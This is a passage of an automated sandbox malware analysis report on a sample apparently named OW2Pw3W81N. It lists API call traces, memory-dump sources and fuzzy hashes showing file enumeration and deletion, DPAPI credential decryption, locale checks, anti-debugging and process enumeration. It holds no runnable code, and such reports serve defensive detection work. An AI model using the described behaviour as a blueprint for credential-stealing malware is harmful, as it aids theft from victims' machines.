                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID: Xq$B
                              • API String ID: 2533653975-579523865
                              • Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                              • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                              • Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                              • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                              APIs
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 022EF985
                              • StrCmpCA.SHLWAPI(?,004215BC), ref: 022EF9D6
                              • StrCmpCA.SHLWAPI(?,004215C0), ref: 022EF9EC
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 022EFD18
                              • FindClose.KERNEL32(000000FF), ref: 022EFD2A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                              • Instruction ID: 6c45e323eb97f3f5fe0a980a2654476231ca5aa70f4130f23701df1e8cec4963
                              • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                              • Instruction Fuzzy Hash: FCB150719203189BCF64FFA4DDA5EEEB37AAF54300F4081A9A50E56258EF345B48CF91
                              APIs
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                              • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                              • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*$@
                              • API String ID: 433455689-2355794846
                              • Opcode ID: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                              • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                              • Opcode Fuzzy Hash: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                              • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                              APIs
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 022E1B8A
                              • StrCmpCA.SHLWAPI(?,0042526C), ref: 022E1BDA
                              • StrCmpCA.SHLWAPI(?,00425314), ref: 022E1BF0
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022E1FA7
                              • DeleteFileA.KERNEL32(00000000), ref: 022E2031
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 022E2087
                              • FindClose.KERNEL32(000000FF), ref: 022E2099
                                • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID:
                              • API String ID: 1415058207-0
                              • Opcode ID: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                              • Instruction ID: 10ae1d3b714fbd67eee01f00ba40f8fca7763c1ebdd70c10f4578533f8b38cf4
                              • Opcode Fuzzy Hash: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                              • Instruction Fuzzy Hash: 7212D0719203189BCB59FBA4CDA5EEDB37AAF64300F4041B9A60E62194EF745F89CF50
                              APIs
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 022EE0C5
                              • StrCmpCA.SHLWAPI(?,004214C8), ref: 022EE115
                              • StrCmpCA.SHLWAPI(?,004214CC), ref: 022EE12B
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 022EE647
                              • FindClose.KERNEL32(000000FF), ref: 022EE659
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID:
                              • API String ID: 2325840235-0
                              • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                              • Instruction ID: 1abcb59c951704e9f86fcd69d1cf7d4e12a5de39169595e985caae893467662b
                              • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                              • Instruction Fuzzy Hash: F1F190715243189ACB59EBA4DDA5EEEF33ABF24700F8041E9A14E62154EF345F89CF50
                              APIs
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                              • LocalFree.KERNEL32(00000000), ref: 00417D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                              • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                              • Opcode Fuzzy Hash: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                              • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                              APIs
                              • memset.MSVCRT ref: 0040C853
                              • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,0070F6A0), ref: 0040C871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                              • memcpy.MSVCRT(?,?,?), ref: 0040C912
                              • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                              • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                              • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                              • String ID:
                              • API String ID: 1498829745-0
                              • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                              • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                              • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                              • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                              APIs
                              • memset.MSVCRT ref: 022ECABA
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 022ECAD8
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 022ECAE3
                              • memcpy.MSVCRT(?,?,?), ref: 022ECB79
                              • lstrcat.KERNEL32(?,00420B46), ref: 022ECBAA
                              • lstrcat.KERNEL32(?,00420B47), ref: 022ECBBE
                              • lstrcat.KERNEL32(?,00420B4E), ref: 022ECBDF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                              • String ID:
                              • API String ID: 1498829745-0
                              • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                              • Instruction ID: 2c08af503c13e0fbdf5f87d3fc45c0b002e540d72ab0b34ad572449b51ee6aef
                              • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                              • Instruction Fuzzy Hash: 1141807895421AEFDB10DFD0DC88BEEBBB8BB44304F1045A9E60AA6284D7745B84CF91
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                              • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID: N@
                              • API String ID: 4291131564-4229412743
                              • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                              • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                              • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                              • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                              APIs
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                              • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 022F7E48
                              • LocalAlloc.KERNEL32(00000040,?), ref: 022F7E60
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 022F7E74
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 022F7EC9
                              • LocalFree.KERNEL32(00000000), ref: 022F7F89
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID:
                              • API String ID: 3090951853-0
                              • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                              • Instruction ID: 5dfc4d8cbe0b65a59f697f838489a01278a062af1954ac38985a9f90d1b60f36
                              • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                              • Instruction Fuzzy Hash: E3415B71960218ABDB64DF94DC98FEDF3B5FB54700F1041A9E109A6284DB742F89CF90
                              APIs
                              • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                              • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                              • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                              • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                              • String ID:
                              • API String ID: 2579439406-0
                              • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                              • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                              • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                              • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                              APIs
                              • IsDebuggerPresent.KERNEL32 ref: 022FBE09
                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 022FBE1E
                              • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 022FBE29
                              • GetCurrentProcess.KERNEL32(C0000409), ref: 022FBE45
                              • TerminateProcess.KERNEL32(00000000), ref: 022FBE4C
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                              • String ID:
                              • API String ID: 2579439406-0
                              • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                              • Instruction ID: 66904e2d839ba537b90f339f0b5abf305c8a958dd3c8f097508dc97e1289fb80
                              • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                              • Instruction Fuzzy Hash: 4721C0BC910305DFDB54DF69F9886967BE4FB0E304F50403AE90A872A4EBB05981EF49
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                              • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 3657800372-0
                              • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                              • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                              • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                              • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 022E74B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 022E74BB
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 022E74E8
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 022E750B
                              • LocalFree.KERNEL32(?), ref: 022E7515
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                              • Instruction ID: ac2e596f8264ad7b28ded79ca0de264b4ff0e531e91211e9fc5c2b9ce0003d93
                              • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                              • Instruction Fuzzy Hash: 75010075A90208BBEB10DFD4DD45F9D77B9EB44704F104155FB06AA2C4D6B0AA00CB65
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                              • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                              • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                              • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                              • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                              • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                              • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 022F9885
                              • Process32First.KERNEL32(00420ACA,00000128), ref: 022F9899
                              • Process32Next.KERNEL32(00420ACA,00000128), ref: 022F98AE
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 022F98C3
                              • CloseHandle.KERNEL32(00420ACA), ref: 022F98E1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                              • Instruction ID: a4468b1a8db77ef6ba41993f3c9aab8bf6032606c7d1dabf9a8951829bf86d50
                              • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                              • Instruction Fuzzy Hash: BB010C79A60208FFDB60DFE4CD54BEDB7F9EF49700F004199A506A6244D7749A84CF51
                              APIs
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 022EE709
                              • StrCmpCA.SHLWAPI(?,004214F8), ref: 022EE759
                              • StrCmpCA.SHLWAPI(?,004214FC), ref: 022EE76F
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 022EEE46
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID:
                              • API String ID: 433455689-0
                              • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                              • Instruction ID: d2484f52ba7a2c3e5aa87b654957175244c4dfe37349d949c1ce3eb7e6c39a22
                              • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                              • Instruction Fuzzy Hash: 1812FA71A203189BDB58FBA4DDA5EEDB37AAF54300F4041B9A60E52198EF345F88CF51
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
